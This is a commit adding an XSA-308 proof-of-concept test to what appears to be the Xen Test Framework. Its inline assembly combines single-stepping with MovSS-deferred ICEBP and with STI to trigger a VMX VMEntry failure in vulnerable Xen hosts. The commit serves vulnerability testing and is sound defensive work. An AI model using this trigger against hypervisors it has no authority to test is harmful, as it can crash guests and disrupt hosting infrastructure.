From: Andrew Cooper <andrew.cooper3@citrix.com>
Date: Mon, 4 Nov 2019 18:18:14 +0000 (+0000)
Subject: XSA-308 PoC
X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=df3fbf2fc8024bd83b903f237f4154eb6dfd815f;p=xtf.git

XSA-308 PoC

Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
---

diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index bcf9b7e..7c0b1a5 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -145,6 +145,9 @@ emulation.
 
 @subpage test-xsa-consoleio-write - CONSOLEIO_write stack overflow
 
+@subpage test-xsa-308 - VMX: VMentry failure with debug exceptions and blocked
+states.
+
 
 @section index-utility Utilities
 
diff --git a/tests/xsa-308/Makefile b/tests/xsa-308/Makefile
new file mode 100644
index 0000000..d95862c
--- /dev/null
+++ b/tests/xsa-308/Makefile
@@ -0,0 +1,9 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-308
+CATEGORY  := xsa
+TEST-ENVS := hvm64
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-308/main.c b/tests/xsa-308/main.c
new file mode 100644
index 0000000..c673be4
--- /dev/null
+++ b/tests/xsa-308/main.c
@@ -0,0 +1,69 @@
+/**
+ * @file tests/xsa-308/main.c
+ * @ref test-xsa-308
+ *
+ * @page test-xsa-308 XSA-308
+ *
+ * Advisory: [XSA-308](https://xenbits.xen.org/xsa/advisory-308.html)
+ *
+ * The VMX VMEntry checks does not like the exact combination of state which
+ * occurs when @#DB in intercepted, Single Stepping is active, and blocked by
+ * STI/MovSS is active, despite this being a legitimate state to be in.
+ *
+ * The exact sequence is the interaction of a MovSS-deferred ICEBP @#DB while
+ * Single Stepping is active.  A related sequence which tickles the same
+ * failure is an STI while Single Stepping is active.
+ *
+ * Run both of these sequences.  If the VM is still alive at the end, it
+ * didn't suffer a VMEntry failure.
+ *
+ * @see tests/xsa-308/main.c
+ */
+#include <xtf.h>
+
+const char test_title[] = "XSA-308 PoC";
+
+void __user_text movss(void)
+{
+    unsigned int tmp;
+
+    asm volatile("mov %%ss, %[tmp];"
+                 "pushf;"
+                 "pushf;"
+                 "orl $"STR(X86_EFLAGS_TF)", (%%"_ASM_SP");"
+                 "popf;"
+                 "mov %[tmp], %%ss;"
+                 ".byte 0xf1;"
+                 "1:; "_ASM_TRAP_OK(1b)
+                 "popf;"
+                 "1:; "_ASM_TRAP_OK(1b)
+                 : [tmp] "=r" (tmp));
+}
+
+void test_main(void)
+{
+    exec_user_void(movss);
+
+    asm volatile("pushf;"
+                 "pushf;"
+                 "orl $"STR(X86_EFLAGS_TF)", (%"_ASM_SP");"
+                 "popf;"
+                 "sti;"
+                 "1:; "_ASM_TRAP_OK(1b)
+                 "popf;"
+                 "1:; "_ASM_TRAP_OK(1b)
+                 "cli;");
+
+    /* If the VM is still alive, it didn't suffer a vmentry failure. */
+    xtf_success("Success: Not vulnerable to XSA-308\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */